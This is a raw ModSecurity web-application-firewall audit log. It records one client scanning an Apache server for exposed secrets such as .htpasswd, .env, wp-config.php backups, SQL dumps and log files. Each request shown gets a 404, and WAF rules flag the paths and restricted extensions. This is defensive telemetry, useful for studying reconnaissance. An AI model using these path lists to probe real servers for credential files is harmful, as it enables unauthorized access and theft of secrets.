[id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/config/.htpasswd"] [unique_id "aFCr_VJfblPUQiSn5r2RmgAAAAA"] Stopwatch: 1750117373720543 2250 (- - -) Stopwatch2: 1750117373720543 2250; combined=1441, p1=269, p2=1084, p3=16, p4=21, p5=51, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --1b76de7e-Z-- --c7db756d-A-- [17/Jun/2025:05:12:53.833326 +0530] aFCr_ZVkCcfT-Z8NQYzE9gAAAAc 185.177.72.204 46698 127.0.0.1 7080 --c7db756d-B-- GET /config/access.log HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --c7db756d-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --c7db756d-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/config/access.log"] [unique_id "aFCr_ZVkCcfT-Z8NQYzE9gAAAAc"] Stopwatch: 1750117373829988 3384 (- - -) Stopwatch2: 1750117373829988 3384; combined=2113, p1=333, p2=1664, p3=27, p4=31, p5=58, sr=95, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c7db756d-Z-- --93496152-A-- [17/Jun/2025:05:12:54.053916 +0530] aFCr_ooVQnPDyHnl9oPTpwAAAAY 185.177.72.204 46726 127.0.0.1 7080 --93496152-B-- GET /config/app.js.bak HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --93496152-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --93496152-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".js.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".js.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/config/app.js.bak"] [unique_id "aFCr_ooVQnPDyHnl9oPTpwAAAAY"] Stopwatch: 1750117374050846 3113 (- - -) Stopwatch2: 1750117374050846 3113; combined=1963, p1=359, p2=1504, p3=19, p4=26, p5=55, sr=124, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --93496152-Z-- --a0888a1e-A-- [17/Jun/2025:05:12:54.828546 +0530] aFCr_lCTF37l_jAzt4oS9gAAAAU 185.177.72.204 46774 127.0.0.1 7080 --a0888a1e-B-- GET /config/backup.sql HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --a0888a1e-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --a0888a1e-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/config/backup.sql"] [unique_id "aFCr_lCTF37l_jAzt4oS9gAAAAU"] Stopwatch: 1750117374825717 2890 (- - -) Stopwatch2: 1750117374825717 2890; combined=1696, p1=326, p2=1244, p3=18, p4=22, p5=85, sr=99, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a0888a1e-Z-- --7ec6127f-A-- [17/Jun/2025:05:12:55.603456 +0530] aFCr_-TJOk1gXj_qIh4X5wAAAAQ 185.177.72.204 46850 127.0.0.1 7080 --7ec6127f-B-- GET /config/config.php.bak HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --7ec6127f-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --7ec6127f-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".php.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".php.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/config/config.php.bak"] [unique_id "aFCr_-TJOk1gXj_qIh4X5wAAAAQ"] Stopwatch: 1750117375600435 3074 (- - -) Stopwatch2: 1750117375600435 3074; combined=1893, p1=326, p2=1465, p3=20, p4=26, p5=56, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --7ec6127f-Z-- --8ab9e24b-A-- [17/Jun/2025:05:12:55.714363 +0530] aFCr_wrsPejRtmHkrKLghgAAAAE 185.177.72.204 46862 127.0.0.1 7080 --8ab9e24b-B-- GET /config/config.yml HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --8ab9e24b-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --8ab9e24b-H-- Message: Warning. Matched phrase "/config/config.yml" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/config/config.yml" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/config/config.yml"] [unique_id "aFCr_wrsPejRtmHkrKLghgAAAAE"] Stopwatch: 1750117375710896 3526 (- - -) Stopwatch2: 1750117375710896 3526; combined=2232, p1=391, p2=1702, p3=30, p4=35, p5=74, sr=101, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --8ab9e24b-Z-- --615c3c6c-A-- [17/Jun/2025:05:12:56.045315 +0530] aFCsAJWbMc1Q3J_M-mhIpgAAAAo 185.177.72.204 46896 127.0.0.1 7080 --615c3c6c-B-- GET /config/db.sql HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --615c3c6c-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --615c3c6c-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/config/db.sql"] [unique_id "aFCsAJWbMc1Q3J_M-mhIpgAAAAo"] Stopwatch: 1750117376042284 3074 (- - -) Stopwatch2: 1750117376042284 3074; combined=1776, p1=363, p2=1321, p3=18, p4=22, p5=52, sr=107, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --615c3c6c-Z-- --18fbc329-A-- [17/Jun/2025:05:12:56.266062 +0530] aFCsAOTJOk1gXj_qIh4X6AAAAAQ 185.177.72.204 46924 127.0.0.1 7080 --18fbc329-B-- GET /config/debug.log HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --18fbc329-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --18fbc329-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/config/debug.log"] [unique_id "aFCsAOTJOk1gXj_qIh4X6AAAAAQ"] Stopwatch: 1750117376263009 3097 (- - -) Stopwatch2: 1750117376263009 3097; combined=1963, p1=325, p2=1537, p3=20, p4=26, p5=55, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --18fbc329-Z-- --dc8d9a61-A-- [17/Jun/2025:05:12:56.596831 +0530] aFCsAGMOUduHrxpwbslYUQAAAAM 185.177.72.204 46952 127.0.0.1 7080 --dc8d9a61-B-- GET /config/dump.sql HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --dc8d9a61-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --dc8d9a61-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/config/dump.sql"] [unique_id "aFCsAGMOUduHrxpwbslYUQAAAAM"] Stopwatch: 1750117376593681 3193 (- - -) Stopwatch2: 1750117376593681 3193; combined=1955, p1=329, p2=1529, p3=21, p4=25, p5=51, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --dc8d9a61-Z-- --91deb13c-A-- [17/Jun/2025:05:12:56.817247 +0530] aFCsAIoVQnPDyHnl9oPTrQAAAAY 185.177.72.204 46978 127.0.0.1 7080 --91deb13c-B-- GET /config/error.log HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --91deb13c-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --91deb13c-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/config/error.log"] [unique_id "aFCsAIoVQnPDyHnl9oPTrQAAAAY"] Stopwatch: 1750117376814134 3164 (- - -) Stopwatch2: 1750117376814134 3164; combined=1913, p1=353, p2=1460, p3=20, p4=24, p5=56, sr=101, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --91deb13c-Z-- --7d120876-A-- [17/Jun/2025:05:12:57.257703 +0530] aFCsAWMOUduHrxpwbslYUgAAAAM 185.177.72.204 46994 127.0.0.1 7080 --7d120876-B-- GET /config/logs/error.log HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --7d120876-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --7d120876-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/config/logs/error.log"] [unique_id "aFCsAWMOUduHrxpwbslYUgAAAAM"] Stopwatch: 1750117377254737 3015 (- - -) Stopwatch2: 1750117377254737 3015; combined=1834, p1=327, p2=1411, p3=18, p4=23, p5=55, sr=90, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --7d120876-Z-- --a0096f3c-A-- [17/Jun/2025:05:12:57.920155 +0530] aFCsAQrsPejRtmHkrKLgiAAAAAE 185.177.72.204 47054 127.0.0.1 7080 --a0096f3c-B-- GET /config/parameters.yml HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --a0096f3c-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --a0096f3c-H-- Message: Warning. Matched phrase "/config/parameters.yml" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/config/parameters.yml" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/config/parameters.yml"] [unique_id "aFCsAQrsPejRtmHkrKLgiAAAAAE"] Stopwatch: 1750117377916624 3589 (- - -) Stopwatch2: 1750117377916624 3589; combined=2147, p1=458, p2=1574, p3=24, p4=27, p5=63, sr=106, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a0096f3c-Z-- --c08f2722-A-- [17/Jun/2025:05:12:59.023653 +0530] aFCsAwrsPejRtmHkrKLgigAAAAE 185.177.72.204 47152 127.0.0.1 7080 --c08f2722-B-- GET /config/site.conf HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --c08f2722-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --c08f2722-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/config/site.conf"] [unique_id "aFCsAwrsPejRtmHkrKLgigAAAAE"] Stopwatch: 1750117379020639 3057 (- - -) Stopwatch2: 1750117379020639 3057; combined=1876, p1=317, p2=1463, p3=18, p4=26, p5=51, sr=87, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c08f2722-Z-- --664cdb24-A-- [17/Jun/2025:05:12:59.134095 +0530] aFCsA4oVQnPDyHnl9oPTsQAAAAY 185.177.72.204 47164 127.0.0.1 7080 --664cdb24-B-- GET /config/site.sql HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --664cdb24-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --664cdb24-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/config/site.sql"] [unique_id "aFCsA4oVQnPDyHnl9oPTsQAAAAY"] Stopwatch: 1750117379130839 3301 (- - -) Stopwatch2: 1750117379130839 3301; combined=2046, p1=333, p2=1600, p3=27, p4=28, p5=58, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --664cdb24-Z-- --5e786260-A-- [17/Jun/2025:05:12:59.576559 +0530] aFCsA5WbMc1Q3J_M-mhIqwAAAAo 185.177.72.204 35744 127.0.0.1 7080 --5e786260-B-- GET /config/wp-config.php HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --5e786260-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --5e786260-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/config/wp-config.php"] [unique_id "aFCsA5WbMc1Q3J_M-mhIqwAAAAo"] Stopwatch: 1750117379573027 3598 (- - -) Stopwatch2: 1750117379573027 3598; combined=2174, p1=476, p2=1569, p3=24, p4=30, p5=75, sr=106, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --5e786260-Z-- --71a1cb7a-A-- [17/Jun/2025:05:12:59.688724 +0530] aFCsA5VkCcfT-Z8NQYzE_gAAAAc 185.177.72.204 35758 127.0.0.1 7080 --71a1cb7a-B-- GET /config/wp-config.php.old HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --71a1cb7a-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --71a1cb7a-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".php.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/config/wp-config.php.old"] [unique_id "aFCsA5VkCcfT-Z8NQYzE_gAAAAc"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".php.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/config/wp-config.php.old"] [unique_id "aFCsA5VkCcfT-Z8NQYzE_gAAAAc"] Stopwatch: 1750117379683870 4898 (- - -) Stopwatch2: 1750117379683870 4898; combined=2890, p1=426, p2=2341, p3=20, p4=26, p5=77, sr=110, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --71a1cb7a-Z-- --d6c9af66-A-- [17/Jun/2025:05:13:00.685793 +0530] aFCsBJVkCcfT-Z8NQYzFAAAAAAc 185.177.72.204 35862 127.0.0.1 7080 --d6c9af66-B-- GET /core/.env HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --d6c9af66-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --d6c9af66-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/core/.env"] 